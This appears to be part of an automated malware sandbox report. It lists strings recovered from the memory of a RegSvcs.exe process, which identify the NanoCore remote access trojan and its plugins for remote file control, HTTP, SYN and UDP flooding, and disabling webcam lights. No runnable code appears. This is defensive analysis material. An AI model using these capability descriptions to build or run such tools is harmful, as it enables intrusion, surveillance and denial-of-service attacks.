ntModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtim